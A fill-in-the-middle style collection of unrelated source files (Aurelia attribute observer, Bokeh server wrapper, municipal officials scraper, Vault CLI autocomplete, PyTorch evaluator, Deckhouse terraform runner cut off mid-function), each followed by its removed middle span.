method_item = self.tree_widget.recursive_search_item(conn_item)
self.tree_widget.set_selected_focus(method_item)
def close(self):
close_sqlite()
self.tab_widget.close()
super().close() | |
element-attribute-observer.ts | import {
DOM,
IBindingTargetObserver,
ILifecycle,
IObserverLocator,
ISubscriber,
ISubscriberCollection,
LifecycleFlags,
Priority,
subscriberCollection,
} from '@aurelia/runtime';
export interface IHtmlElement extends HTMLElement {
$mObserver: MutationObserver;
$eMObservers: Set<ElementMutationSubscription>;
}
export interface ElementMutationSubscription {
handleMutation(mutationRecords: MutationRecord[]): void;
}
export interface AttributeObserver extends
IBindingTargetObserver<IHtmlElement, string>,
ISubscriber,
ISubscriberCollection { }
/**
* Observer for handling two-way binding with attributes
* Has different strategy for class/style and normal attributes
* TODO: handle SVG/attributes with namespace
*/
@subscriberCollection()
export class | implements AttributeObserver, ElementMutationSubscription {
public readonly lifecycle: ILifecycle;
public readonly observerLocator: IObserverLocator;
public readonly obj: IHtmlElement;
public readonly propertyKey: string;
public readonly targetAttribute: string;
public currentValue: unknown;
public oldValue: unknown;
public hasChanges: boolean;
public priority: Priority;
constructor(
lifecycle: ILifecycle,
observerLocator: IObserverLocator,
element: Element,
propertyKey: string,
targetAttribute: string,
) {
this.observerLocator = observerLocator;
this.lifecycle = lifecycle;
this.obj = element as IHtmlElement;
this.propertyKey = propertyKey;
this.targetAttribute = targetAttribute;
this.currentValue = null;
this.oldValue = null;
this.hasChanges = false;
this.priority = Priority.propagate;
}
public getValue(): unknown {
return this.currentValue;
}
public setValue(newValue: unknown, flags: LifecycleFlags): void {
this.currentValue = newValue;
this.hasChanges = newValue !== this.oldValue;
if ((flags & LifecycleFlags.fromBind) > 0) {
this.flushRAF(flags);
}
}
public flushRAF(flags: LifecycleFlags): void {
if (this.hasChanges) {
this.hasChanges = false;
const { currentValue } = this;
this.oldValue = currentValue;
switch (this.targetAttribute) {
case 'class': {
// Why is class attribute observer setValue look different with class attribute accessor?
// ==============
// For class list
// newValue is simply checked if truthy or falsy
// and toggle the class accordingly
// -- the rule of this is quite different to normal attribute
//
// for class attribute, observer is different in a way that it only observe a particular class at a time
// this also comes from syntax, where it would typically be my-class.class="someProperty"
//
// so there is no need for separating class by space and add all of them like class accessor
if (!!currentValue) {
this.obj.classList.add(this.propertyKey);
} else {
this.obj.classList.remove(this.propertyKey);
}
break;
}
case 'style': {
let priority = '';
let newValue = currentValue as string;
if (typeof newValue === 'string' && newValue.includes('!important')) {
priority = 'important';
newValue = newValue.replace('!important', '');
}
this.obj.style.setProperty(this.propertyKey, newValue, priority);
}
}
}
}
public handleMutation(mutationRecords: MutationRecord[]): void {
let shouldProcess = false;
for (let i = 0, ii = mutationRecords.length; ii > i; ++i) {
const record = mutationRecords[i];
if (record.type === 'attributes' && record.attributeName === this.propertyKey) {
shouldProcess = true;
break;
}
}
if (shouldProcess) {
let newValue;
switch (this.targetAttribute) {
case 'class':
newValue = this.obj.classList.contains(this.propertyKey);
break;
case 'style':
newValue = this.obj.style.getPropertyValue(this.propertyKey);
break;
default:
throw new Error(`Unsupported targetAttribute: ${this.targetAttribute}`);
}
if (newValue !== this.currentValue) {
const { currentValue } = this;
this.currentValue = this.oldValue = newValue;
this.hasChanges = false;
this.callSubscribers(newValue, currentValue, LifecycleFlags.fromDOMEvent);
}
}
}
public subscribe(subscriber: ISubscriber): void {
if (!this.hasSubscribers()) {
this.currentValue = this.oldValue = this.obj.getAttribute(this.propertyKey);
startObservation(this.obj, this);
}
this.addSubscriber(subscriber);
}
public unsubscribe(subscriber: ISubscriber): void {
this.removeSubscriber(subscriber);
if (!this.hasSubscribers()) {
stopObservation(this.obj, this);
}
}
public bind(flags: LifecycleFlags): void {
this.lifecycle.enqueueRAF(this.flushRAF, this, this.priority);
}
public unbind(flags: LifecycleFlags): void {
this.lifecycle.dequeueRAF(this.flushRAF, this);
}
}
const startObservation = (element: IHtmlElement, subscription: ElementMutationSubscription): void => {
if (element.$eMObservers === undefined) {
element.$eMObservers = new Set();
}
if (element.$mObserver === undefined) {
element.$mObserver = DOM.createNodeObserver!(
element,
// @ts-ignore
handleMutation,
{ attributes: true }
) as MutationObserver;
}
element.$eMObservers.add(subscription);
};
const stopObservation = (element: IHtmlElement, subscription: ElementMutationSubscription): boolean => {
const $eMObservers = element.$eMObservers;
if ($eMObservers.delete(subscription)) {
if ($eMObservers.size === 0) {
element.$mObserver.disconnect();
element.$mObserver = undefined!;
}
return true;
}
return false;
};
const handleMutation = (mutationRecords: MutationRecord[]): void => {
(mutationRecords[0].target as IHtmlElement).$eMObservers.forEach(invokeHandleMutation, mutationRecords);
};
function invokeHandleMutation(this: MutationRecord[], s: ElementMutationSubscription): void {
s.handleMutation(this);
}
| AttributeObserver |
test_nested_types.rs | // Autogenerated from KST: please remove this line if doing any edits by hand!
extern crate kaitai_struct;
extern crate rust;
use kaitai_struct::KaitaiStruct;
use rust::NestedTypes;
#[test]
fn | () {
if let Ok(r) = NestedTypes::from_file("src/fixed_struct.bin") {
assert_eq!(r.one.typed_at_root.value_b, 80);
assert_eq!(r.one.typed_here.value_c, 65);
assert_eq!(r.two.value_b, 67);
}
}
| test_nested_types |
main.py | """Command line wrapper to serve one or more named Bokeh scripts or folders."""
import logging
import os
import re
import pathlib
import tempfile
from typing import Any, Dict, Tuple
import bokeh.server.views
import click
from bokeh.application.application import Application
from bokeh.command.util import build_single_handler_application
from bokeh.server.server import Server as _BkServer
from bokeh.server.views.root_handler import RootHandler
import logging
from .readycheck import create_ready_app
FORMAT = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(format=FORMAT)
root_logger = logging.getLogger()
root_logger.setLevel(logging.INFO)
logger = logging.getLogger('bokeh_root_cmd')
class BokehServer:
def __init__(self, prefix=''):
self.prefix = prefix
if self.prefix != '':
self.html_file = None
def __del__(self):
if self.prefix != '' and self.html_file is not None:
self.html_file.close()
def _get_default_index_html(self):
return str(pathlib.Path(bokeh.server.views.__file__).parent / "app_index.html")
def _get_index_html(self):
"""
Where there is a prefix (e.g. /user/dan/dash-test) supplied, Bokeh/Panel's server doesn't work for us.
It doesn't distinguish between server-side and client-side URLs.
We want it to serve sub-apps at the URL /PanelNotebook
(so accessible at /user/dan/dash-test/PanelNotebook behind the cdsdashboards reverse proxy)
but for URLs on the index page to point the browser to /user/dan/dash-test/PanelNotebook.
Setting prefix in Bokeh results in correct client-side behavior, but unhelpfully also
serves at the prefix (So, combined with cdsdashboards reverse proxy it is only accessible at
/user/dan/dash-test/user/dan/dash-test/PanelNotebook).
"""
if hasattr(self, 'html_file'):
if self.html_file is None:
self.html_file = tempfile.NamedTemporaryFile("wt", suffix='.html')
with open(self._get_default_index_html(), "rt") as f:
for r in f.readlines():
r = re.sub(r'\{\{\s*prefix\s*\}\}', self.prefix, r)
self.html_file.write(r)
self.html_file.flush()
return self.html_file.name
return self._get_default_index_html()
@staticmethod
def _get_server_class():
return _BkServer
@staticmethod
def _make_app(command: str, url: str = "/", debug: bool = False) -> Application:
cwd_original = os.getcwd()
# Command can be absolute, or could be relative to cwd
app_py_path = os.path.join(os.getcwd(), command)
if os.path.isdir(app_py_path):
dirname = app_py_path
else:
dirname = os.path.dirname(app_py_path)
if app_py_path==dirname:
logger.debug("Fetching folder {}".format(app_py_path))
else:
logger.debug("Fetching script {}".format(app_py_path))
if os.path.isdir(dirname):
logger.debug("Changing working dir to {}".format(dirname))
os.chdir(dirname)
app = build_single_handler_application(app_py_path, [url])
os.chdir(cwd_original)
logger.debug("Changing working dir back to {}".format(cwd_original))
return app
@classmethod
def _is_single_app(cls, cmd: str):
"""
Return True if the path specified in `cmd` is exactly one app: either a single py/ipynb file
or a folder containing a main.py or main.ipynb file.
"""
cmd_path = pathlib.Path(cmd)
return cmd_path.is_file() or (cmd_path / "main.py").is_file() or (cmd_path / "main.ipynb").is_file()
@classmethod
def _get_applications(cls, command: Tuple[str], debug=False) -> Dict[str, Application]:
if len(command) == 1 and cls._is_single_app(command[0]):
return {"/": cls._make_app(command[0], debug)}
apps = {}
for cmd in command:
if cls._is_single_app(cmd):
cmds = [cmd]
else:
cmd_path = pathlib.Path(cmd)
cmds = list(cmd_path.glob("*.ipynb")) + list(cmd_path.glob("*.py"))
for singlecmd in cmds:
application = cls._make_app(singlecmd, debug)
route = application.handlers[0].url_path()
apps[route] = application
return apps
def _get_server_kwargs(self, port, ip, allow_websocket_origin, is_single_app) -> Dict[str, Any]:
server_kwargs = {"port": port, "ip": ip}
if allow_websocket_origin:
server_kwargs["allow_websocket_origin"] = list(allow_websocket_origin)
if not is_single_app:
index_html = self._get_index_html()
logger.debug("Using HTML template %s", index_html)
server_kwargs.update(
{"use_index": True, "redirect_root": True, "index": index_html}
)
return server_kwargs
def run(self, port, ip, debug, allow_websocket_origin, prefix, command):
logger.info("Starting %s", type(self).__name__)
if debug:
root_logger.setLevel(logging.DEBUG)
logger.debug("ip = %s", ip)
logger.debug("port = %s", port)
logger.debug("debug = %s", debug)
logger.debug("allow_websocket_origin = %s", allow_websocket_origin)
logger.debug("prefix = %s", prefix)
logger.debug("command = %s", command)
applications = self._get_applications(command, debug)
applications["/ready-check"] = create_ready_app()
logger.debug("applications = %s", list(applications.keys()))
server_kwargs = self._get_server_kwargs(port, ip, allow_websocket_origin, len(applications) <= 2)
if debug:
server_kwargs["log_level"]="debug"
server_kwargs["log_format"]=FORMAT
logger.debug("server_kwargs = %s", server_kwargs)
server = self._get_server_class()(applications, **server_kwargs)
server.run_until_shutdown()
class PanelServer(BokehServer):
@staticmethod
def _get_server_class():
|
def _get_default_index_html(self):
from panel.io.server import INDEX_HTML as _PANEL_INDEX_HTML
return _PANEL_INDEX_HTML
@click.command()
@click.option("--port", default=8888, type=click.INT, help="port for the proxy server to listen on")
@click.option("--ip", default=None, help="Address to listen on")
@click.option(
"--allow-websocket-origin", default=None, multiple=True, help="Web socket origins allowed"
)
@click.option("--debug/--no-debug", default=False, help="To display debug level logs")
@click.option(
"--server", default="bokeh", type=click.STRING, help="The server to use. One of bokeh or panel. Default is bokeh."
)
@click.option(
"--prefix", default="", type=click.STRING, help="URL prefix (for"
)
@click.argument("command", nargs=-1, required=True)
def run(port, ip, debug, allow_websocket_origin, server, prefix, command):
if server=="panel":
server = PanelServer(prefix)
else:
server = BokehServer(prefix)
server.run(
port=port,
ip=ip,
debug=debug,
allow_websocket_origin=allow_websocket_origin,
prefix=prefix,
command=command,
)
# Bokeh/ Panel can serve an index page with a list of applications at "/"
# The below is a workaround to avoid including the 'ready-check' application
def _root_handler_initialize_without_ready_check(self, *args, **kw):
kw["applications"]=kw["applications"].copy()
if "/ready-check" in kw["applications"]:
kw["applications"].pop("/ready-check")
self.applications = kw["applications"]
self.prefix = kw["prefix"]
self.index = kw["index"]
self.use_redirect = kw["use_redirect"]
RootHandler.initialize = _root_handler_initialize_without_ready_check
if __name__ == "__main__":
try:
run()
except SystemExit as se:
logger.error("Caught SystemExit {}".format(se))
| from panel.io.server import Server as _PnServer
return _PnServer |
people.py | from utils import CSVScraper, CanadianPerson as Person
from pupa.scrape import Organization, Post
from collections import defaultdict
import re
class CanadaMunicipalitiesPersonScraper(CSVScraper):
csv_url = 'https://docs.google.com/spreadsheets/d/e/2PACX-1vRrGXQy8qk16OhuTjlccoGB4jL5e8X1CEqRbg896ufLdh67DQk9nuGm-oufIT0HRMPEnwePw2HDx1Vj/pub?gid=0&single=true&output=csv'
encoding = 'utf-8'
"""
Returns whether the row should be imported.
"""
def is_valid_row(self, row):
return super().is_valid_row(row) and row['organization']
def scrape(self):
| organizations = {}
seat_numbers = defaultdict(lambda: defaultdict(int))
reader = self.csv_reader(self.csv_url, delimiter=self.delimiter, header=True, encoding=self.encoding, skip_rows=self.skip_rows)
reader.fieldnames = [self.header_converter(field) for field in reader.fieldnames]
for row in reader:
try:
if self.is_valid_row(row):
for key, corrections in self.corrections.items():
if not isinstance(corrections, dict):
row[key] = corrections(row[key])
elif row[key] in corrections:
row[key] = corrections[row[key]]
organization_classification = 'legislature'
organization_name = row['organization']
organization_key = organization_name.lower()
if organization_key in organizations:
organization = organizations[organization_key]
else:
organization = Organization(organization_name, classification=organization_classification)
organization.add_source(self.csv_url)
yield organization
organizations[organization_key] = organization
if not row['primary role']:
row['primary role'] = 'Councillor'
role = row['primary role']
post = Post(role=role, label=organization_name, organization_id=organization._id)
yield post
name = row['name'].strip(' .,')
district = row['district name']
if self.many_posts_per_area and role not in self.unique_roles:
seat_numbers[role][district] += 1
district = '{} (seat {})'.format(district, seat_numbers[role][district])
p = Person(primary_org=organization_classification, name=name, district=district, role=role, party=row.get('party name'))
p.add_source(self.csv_url)
if row.get('gender'):
p.gender = row['gender']
if row.get('photo url'):
p.image = row['photo url']
if row.get('source url'):
p.add_source(row['source url'].strip(' .,'))
if row.get('website'):
p.add_link(row['website'], note='web site')
if row.get('facebook'):
p.add_link(re.sub(r'[#?].+', '', row['facebook']))
if row.get('twitter'):
p.add_link(row['twitter'])
if row['email']:
p.add_contact('email', row['email'].strip(' .,'))
if row['address']:
p.add_contact('address', row['address'], 'legislature')
if row.get('phone'):
p.add_contact('voice', row['phone'], 'legislature')
if row.get('fax'):
p.add_contact('fax', row['fax'], 'legislature')
if row.get('cell'):
p.add_contact('cell', row['cell'], 'legislature')
if row.get('birth date'):
p.birth_date = row['birth date']
if row.get('incumbent'):
p.extras['incumbent'] = row['incumbent']
if name in self.other_names:
for other_name in self.other_names[name]:
p.add_name(other_name)
# Validate person entity so that we can catch the exception if needed.
p.validate()
yield p
except Exception as e:
print(repr(e))
continue |
|
DataExportServerController.ts | import IExportHandler from './interfaces/IExportHandler';
export default class DataExportServerController {
public static getInstance() {
if (!DataExportServerController.instance) {
DataExportServerController.instance = new DataExportServerController();
}
return DataExportServerController.instance;
}
private static instance: DataExportServerController = null;
/**
* Local thread cache -----
*/
private registered_export_handlers: { [export_type_id: string]: IExportHandler } = {};
/**
* ----- Local thread cache
*/
private constructor() { }
public register_export_handler(export_type_id: string, exhandler: IExportHandler) {
this.registered_export_handlers[export_type_id] = exhandler; |
get export_handlers(): { [export_type_id: string]: IExportHandler } {
return this.registered_export_handlers;
}
} | } |
base_predict.go | package command
import (
"sort"
"strings"
"sync"
"github.com/hashicorp/vault/api"
"github.com/posener/complete"
)
type Predict struct {
client *api.Client
clientOnce sync.Once
}
func NewPredict() *Predict {
return &Predict{}
}
func (p *Predict) Client() *api.Client {
p.clientOnce.Do(func() {
if p.client == nil { // For tests
client, _ := api.NewClient(nil)
if client.Token() == "" {
helper, err := DefaultTokenHelper()
if err != nil {
return
}
token, err := helper.Get()
if err != nil {
return
}
client.SetToken(token)
}
p.client = client
}
})
return p.client
}
// defaultPredictVaultMounts is the default list of mounts to return to the
// user. This is a best-guess, given we haven't communicated with the Vault
// server. If the user has no token or if the token does not have the default
// policy attached, it won't be able to read cubbyhole/, but it's a better UX
// that returning nothing.
var defaultPredictVaultMounts = []string{"cubbyhole/"}
// predictClient is the API client to use for prediction. We create this at the
// beginning once, because completions are generated for each command (and this
// doesn't change), and the only way to configure the predict/autocomplete
// client is via environment variables. Even if the user specifies a flag, we
// can't parse that flag until after the command is submitted.
var predictClient *api.Client
var predictClientOnce sync.Once
// PredictClient returns the cached API client for the predictor.
func | () *api.Client {
predictClientOnce.Do(func() {
if predictClient == nil { // For tests
predictClient, _ = api.NewClient(nil)
}
})
return predictClient
}
// PredictVaultAvailableMounts returns a predictor for the available mounts in
// Vault. For now, there is no way to programmatically get this list. If, in the
// future, such a list exists, we can adapt it here. Until then, it's
// hard-coded.
func (b *BaseCommand) PredictVaultAvailableMounts() complete.Predictor {
// This list does not contain deprecated backends. At present, there is no
// API that lists all available secret backends, so this is hard-coded :(.
return complete.PredictSet(
"aws",
"consul",
"database",
"generic",
"pki",
"plugin",
"rabbitmq",
"ssh",
"totp",
"transit",
)
}
// PredictVaultAvailableAuths returns a predictor for the available auths in
// Vault. For now, there is no way to programmatically get this list. If, in the
// future, such a list exists, we can adapt it here. Until then, it's
// hard-coded.
func (b *BaseCommand) PredictVaultAvailableAuths() complete.Predictor {
return complete.PredictSet(
"app-id",
"approle",
"aws",
"cert",
"gcp",
"github",
"ldap",
"okta",
"plugin",
"radius",
"userpass",
)
}
// PredictVaultFiles returns a predictor for Vault mounts and paths based on the
// configured client for the base command. Unfortunately this happens pre-flag
// parsing, so users must rely on environment variables for autocomplete if they
// are not using Vault at the default endpoints.
func (b *BaseCommand) PredictVaultFiles() complete.Predictor {
return NewPredict().VaultFiles()
}
// PredictVaultFolders returns a predictor for "folders". See PredictVaultFiles
// for more information and restrictions.
func (b *BaseCommand) PredictVaultFolders() complete.Predictor {
return NewPredict().VaultFolders()
}
// PredictVaultMounts returns a predictor for "folders". See PredictVaultFiles
// for more information and restrictions.
func (b *BaseCommand) PredictVaultMounts() complete.Predictor {
return NewPredict().VaultMounts()
}
// PredictVaultAudits returns a predictor for "folders". See PredictVaultFiles
// for more information and restrictions.
func (b *BaseCommand) PredictVaultAudits() complete.Predictor {
return NewPredict().VaultAudits()
}
// PredictVaultAuths returns a predictor for "folders". See PredictVaultFiles
// for more information and restrictions.
func (b *BaseCommand) PredictVaultAuths() complete.Predictor {
return NewPredict().VaultAuths()
}
// PredictVaultPolicies returns a predictor for "folders". See PredictVaultFiles
// for more information and restrictions.
func (b *BaseCommand) PredictVaultPolicies() complete.Predictor {
return NewPredict().VaultPolicies()
}
// VaultFiles returns a predictor for Vault "files". This is a public API for
// consumers, but you probably want BaseCommand.PredictVaultFiles instead.
func (p *Predict) VaultFiles() complete.Predictor {
return p.vaultPaths(true)
}
// VaultFolders returns a predictor for Vault "folders". This is a public
// API for consumers, but you probably want BaseCommand.PredictVaultFolders
// instead.
func (p *Predict) VaultFolders() complete.Predictor {
return p.vaultPaths(false)
}
// VaultMounts returns a predictor for Vault "folders". This is a public
// API for consumers, but you probably want BaseCommand.PredictVaultMounts
// instead.
func (p *Predict) VaultMounts() complete.Predictor {
return p.filterFunc(p.mounts)
}
// VaultAudits returns a predictor for Vault "folders". This is a public API for
// consumers, but you probably want BaseCommand.PredictVaultAudits instead.
func (p *Predict) VaultAudits() complete.Predictor {
return p.filterFunc(p.audits)
}
// VaultAuths returns a predictor for Vault "folders". This is a public API for
// consumers, but you probably want BaseCommand.PredictVaultAuths instead.
func (p *Predict) VaultAuths() complete.Predictor {
return p.filterFunc(p.auths)
}
// VaultPolicies returns a predictor for Vault "folders". This is a public API for
// consumers, but you probably want BaseCommand.PredictVaultPolicies instead.
func (p *Predict) VaultPolicies() complete.Predictor {
return p.filterFunc(p.policies)
}
// vaultPaths parses the CLI options and returns the "best" list of possible
// paths. If there are any errors, this function returns an empty result. All
// errors are suppressed since this is a prediction function.
func (p *Predict) vaultPaths(includeFiles bool) complete.PredictFunc {
return func(args complete.Args) []string {
// Do not predict more than one paths
if p.hasPathArg(args.All) {
return nil
}
client := p.Client()
if client == nil {
return nil
}
path := args.Last
var predictions []string
if strings.Contains(path, "/") {
predictions = p.paths(path, includeFiles)
} else {
predictions = p.filter(p.mounts(), path)
}
// Either no results or many results, so return.
if len(predictions) != 1 {
return predictions
}
// If this is not a "folder", do not try to recurse.
if !strings.HasSuffix(predictions[0], "/") {
return predictions
}
// If the prediction is the same as the last guess, return it (we have no
// new information and we won't get anymore).
if predictions[0] == args.Last {
return predictions
}
// Re-predict with the remaining path
args.Last = predictions[0]
return p.vaultPaths(includeFiles).Predict(args)
}
}
// paths predicts all paths which start with the given path.
func (p *Predict) paths(path string, includeFiles bool) []string {
client := p.Client()
if client == nil {
return nil
}
// Vault does not support listing based on a sub-key, so we have to back-pedal
// to the last "/" and return all paths on that "folder". Then we perform
// client-side filtering.
root := path
idx := strings.LastIndex(root, "/")
if idx > 0 && idx < len(root) {
root = root[:idx+1]
}
paths := p.listPaths(root)
var predictions []string
for _, p := range paths {
// Calculate the absolute "path" for matching.
p = root + p
if strings.HasPrefix(p, path) {
// Ensure this is a directory or we've asked to include files.
if includeFiles || strings.HasSuffix(p, "/") {
predictions = append(predictions, p)
}
}
}
// Add root to the path
if len(predictions) == 0 {
predictions = append(predictions, path)
}
return predictions
}
// audits returns a sorted list of the audit backends for Vault server for
// which the client is configured to communicate with.
func (p *Predict) audits() []string {
client := p.Client()
if client == nil {
return nil
}
audits, err := client.Sys().ListAudit()
if err != nil {
return nil
}
list := make([]string, 0, len(audits))
for m := range audits {
list = append(list, m)
}
sort.Strings(list)
return list
}
// auths returns a sorted list of the enabled auth provides for Vault server for
// which the client is configured to communicate with.
func (p *Predict) auths() []string {
client := p.Client()
if client == nil {
return nil
}
auths, err := client.Sys().ListAuth()
if err != nil {
return nil
}
list := make([]string, 0, len(auths))
for m := range auths {
list = append(list, m)
}
sort.Strings(list)
return list
}
// policies returns a sorted list of the policies stored in this Vault
// server.
func (p *Predict) policies() []string {
client := p.Client()
if client == nil {
return nil
}
policies, err := client.Sys().ListPolicies()
if err != nil {
return nil
}
sort.Strings(policies)
return policies
}
// mounts returns a sorted list of the mount paths for Vault server for
// which the client is configured to communicate with. This function returns the
// default list of mounts if an error occurs.
func (p *Predict) mounts() []string {
client := p.Client()
if client == nil {
return nil
}
mounts, err := client.Sys().ListMounts()
if err != nil {
return defaultPredictVaultMounts
}
list := make([]string, 0, len(mounts))
for m := range mounts {
list = append(list, m)
}
sort.Strings(list)
return list
}
// listPaths returns a list of paths (HTTP LIST) for the given path. This
// function returns an empty list of any errors occur.
func (p *Predict) listPaths(path string) []string {
client := p.Client()
if client == nil {
return nil
}
secret, err := client.Logical().List(path)
if err != nil || secret == nil || secret.Data == nil {
return nil
}
paths, ok := secret.Data["keys"].([]interface{})
if !ok {
return nil
}
list := make([]string, 0, len(paths))
for _, p := range paths {
if str, ok := p.(string); ok {
list = append(list, str)
}
}
sort.Strings(list)
return list
}
// hasPathArg determines if the args have already accepted a path.
func (p *Predict) hasPathArg(args []string) bool {
var nonFlags []string
for _, a := range args {
if !strings.HasPrefix(a, "-") {
nonFlags = append(nonFlags, a)
}
}
return len(nonFlags) > 2
}
// filterFunc is used to compose a complete predictor that filters an array
// of strings as per the filter function.
func (p *Predict) filterFunc(f func() []string) complete.Predictor {
return complete.PredictFunc(func(args complete.Args) []string {
if p.hasPathArg(args.All) {
return nil
}
client := p.Client()
if client == nil {
return nil
}
return p.filter(f(), args.Last)
})
}
// filter filters the given list for items that start with the prefix.
func (p *Predict) filter(list []string, prefix string) []string {
var predictions []string
for _, item := range list {
if strings.HasPrefix(item, prefix) {
predictions = append(predictions, item)
}
}
return predictions
}
| PredictClient |
evaluator.py | __all__ = ["EvaluatingInferencer"]
from dataclasses import dataclass
from typing import Sequence
import torch
import torch.utils.data as td
import utils
from datasets import BatchData
from .inferencer import Inferencer
from evaluators import FinegrainedEvaluator
@dataclass
class EvaluatingInferencer(Inferencer):
evaluators: Sequence[FinegrainedEvaluator] = tuple()
_requires_lexical_form: bool = utils.private_field(default=False)
def __post_init__(self):
|
def on_run_started(self, dataloader: td.DataLoader) -> td.DataLoader:
dataloader = super().on_run_started(dataloader)
for evaluator in self.evaluators:
evaluator.reset()
return dataloader
def on_batch_ended(self, batch: BatchData, pred: BatchData, outputs
) -> utils.TensorMap:
stats = dict(super().on_batch_ended(batch, pred, outputs))
batch_lex, pred_lex = None, None
if self._requires_lexical_form:
batch_lex = list(map(self.processor.lexicalize_global, batch))
pred_lex = list(map(self.processor.lexicalize_global, pred))
with torch.no_grad():
for evaluator in self.evaluators:
if evaluator.requires_lexical_form:
eval_stats = evaluator.update(batch_lex, pred_lex, outputs)
else:
eval_stats = evaluator.update(batch, pred, outputs)
stats.update(eval_stats or dict())
return stats
def on_run_ended(self, stats: utils.TensorMap) -> utils.TensorMap:
stats = dict(super().on_run_ended(stats))
with torch.no_grad():
for evaluator in self.evaluators:
stats.update(evaluator.get() or dict())
return stats
| super().__post_init__()
self._requires_lexical_form = any(e.requires_lexical_form
for e in self.evaluators) |
runner.go | // Copyright 2021 Flant CJSC
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package terraform
import (
"bufio"
"bytes"
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"os/exec"
"path/filepath"
"syscall"
"time"
"github.com/hashicorp/go-multierror"
"github.com/deckhouse/deckhouse/dhctl/pkg/app"
"github.com/deckhouse/deckhouse/dhctl/pkg/config"
"github.com/deckhouse/deckhouse/dhctl/pkg/log"
"github.com/deckhouse/deckhouse/dhctl/pkg/state"
"github.com/deckhouse/deckhouse/dhctl/pkg/state/cache"
"github.com/deckhouse/deckhouse/dhctl/pkg/util/input"
)
const (
deckhouseClusterStateSuffix = "-dhctl.*.tfstate"
deckhousePlanSuffix = "-dhctl.*.tfplan"
cloudProvidersDir = "/deckhouse/candi/cloud-providers/"
varFileName = "cluster-config.auto.*.tfvars.json"
terraformHasChangesExitCode = 2
terraformPipelineAbortedMessage = `
Terraform pipeline aborted.
If you want to drop the cache and continue, please run dhctl with "--yes-i-want-to-drop-cache" flag.
`
)
const (
PlanHasNoChanges = iota
PlanHasChanges
PlanHasDestructiveChanges
)
var (
ErrRunnerStopped = errors.New("Terraform runner was stopped.")
ErrTerraformApplyAborted = errors.New("Terraform apply aborted.")
)
type ChangeActionSettings struct {
AutoDismissDestructive bool
AutoApprove bool
SkipChangesOnDeny bool
}
type Runner struct {
name string
prefix string
step string
workingDir string
statePath string
planPath string
variablesPath string
changeSettings ChangeActionSettings
allowedCachedState bool
changesInPlan int
stateCache state.Cache
stateSaver *StateSaver
cmd *exec.Cmd
confirm func() *input.Confirmation
stopped bool
}
func NewRunner(provider, prefix, layout, step string) *Runner {
return &Runner{
prefix: prefix,
step: step,
name: step,
workingDir: buildTerraformPath(provider, layout, step),
confirm: input.NewConfirmation,
stateCache: cache.Global(),
changeSettings: ChangeActionSettings{},
}
}
func NewRunnerFromConfig(cfg *config.MetaConfig, step string) *Runner {
return NewRunner(cfg.ProviderName, cfg.ClusterPrefix, cfg.Layout, step)
}
func (r *Runner) WithCache(cache state.Cache) *Runner {
r.stateCache = cache
return r
}
func (r *Runner) WithName(name string) *Runner {
r.name = name
return r
}
func (r *Runner) WithConfirm(confirm func() *input.Confirmation) *Runner {
r.confirm = confirm
return r
}
func (r *Runner) WithStatePath(statePath string) *Runner {
r.statePath = statePath
return r
}
func (r *Runner) WithState(stateData []byte) *Runner {
tmpFile, err := ioutil.TempFile(app.TmpDirName, r.step+deckhouseClusterStateSuffix)
if err != nil {
log.ErrorF("can't save terraform state for runner %s: %s\n", r.step, err)
return r
}
err = ioutil.WriteFile(tmpFile.Name(), stateData, 0o600)
if err != nil {
log.ErrorF("can't write terraform state for runner %s: %s\n", r.step, err)
return r
}
r.statePath = tmpFile.Name()
return r
}
func (r *Runner) WithVariables(variablesData []byte) *Runner {
tmpFile, err := ioutil.TempFile(app.TmpDirName, varFileName)
if err != nil {
log.ErrorF("can't save terraform variables for runner %s: %s\n", r.step, err)
return r
}
err = ioutil.WriteFile(tmpFile.Name(), variablesData, 0o600)
if err != nil {
log.ErrorF("can't write terraform variables for runner %s: %s\n", r.step, err)
return r
}
r.variablesPath = tmpFile.Name()
return r
}
func (r *Runner) WithAutoApprove(flag bool) *Runner {
r.changeSettings.AutoApprove = flag
return r
}
func (r *Runner) WithAutoDismissDestructiveChanges(flag bool) *Runner {
r.changeSettings.AutoDismissDestructive = flag
return r
}
func (r *Runner) WithAllowedCachedState(flag bool) *Runner {
r.allowedCachedState = flag
return r
}
func (r *Runner) WithSkipChangesOnDeny(flag bool) *Runner {
r.changeSettings.SkipChangesOnDeny = flag
return r
}
func (r *Runner) WithIntermediateStateSaver(saver *StateSaver) *Runner {
r.stateSaver = saver
return r
}
func (r *Runner) Init() error {
if r.stopped {
return ErrRunnerStopped
}
if r.statePath == "" {
// Save state directly in the cache to prevent state loss
stateName := r.stateName()
r.statePath = r.stateCache.GetPath(stateName)
if r.stateCache.InCache(stateName) {
log.InfoF("Cached Terraform state found:\n\t%s\n\n", r.statePath)
if !r.allowedCachedState {
var isConfirm bool
switch app.UseTfCache {
case app.UseStateCacheYes:
isConfirm = true
case app.UseStateCacheNo:
isConfirm = false
default:
isConfirm = r.confirm().
WithMessage("Do you want to continue with Terraform state from local cache?").
WithYesByDefault().
Ask()
}
if !isConfirm {
return fmt.Errorf(terraformPipelineAbortedMessage)
}
}
stateData := r.stateCache.Load(stateName)
if len(stateData) > 0 {
err := ioutil.WriteFile(r.statePath, stateData, 0o600)
if err != nil {
err := fmt.Errorf("can't write terraform state for runner %s: %s", r.step, err)
log.ErrorLn(err)
return err
}
}
}
}
// If statePath still empty, it means that something wrong with cache. Let's create file for the state in tmp directory.
if r.statePath == "" {
r.WithState(nil)
}
return log.Process("default", "terraform init ...", func() error {
args := []string{
"init",
"-get-plugins=false",
"-no-color",
"-input=false",
fmt.Sprintf("-var-file=%s", r.variablesPath),
r.workingDir,
}
_, err := r.execTerraform(args...)
return err
})
}
func (r *Runner) stateName() string {
return fmt.Sprintf("%s.tfstate", r.name)
}
func (r *Runner) handleChanges() (bool, error) {
// first verify destructive change
if r.changesInPlan == PlanHasDestructiveChanges && r.changeSettings.AutoDismissDestructive {
// skip plan
return true, nil
}
//
if r.changeSettings.AutoApprove || r.changesInPlan == PlanHasNoChanges {
return false, nil
}
if !r.confirm().WithMessage("Do you want to CHANGE objects state in the cloud?").Ask() {
